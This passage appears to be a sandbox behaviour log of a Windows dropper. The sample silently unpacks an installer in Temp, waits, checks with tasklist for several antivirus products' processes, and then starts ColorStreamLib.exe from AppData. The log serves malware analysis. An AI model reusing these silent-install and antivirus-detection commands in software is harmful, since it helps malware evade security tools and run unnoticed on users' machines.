Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Process created: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp "C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$20474,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9
Source: C:\Windows\System32\timeout.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe"
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Process created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Process created: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp "C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$1044E,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Process created: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp "C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$20474,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: sppc.dll	Jump to behavior
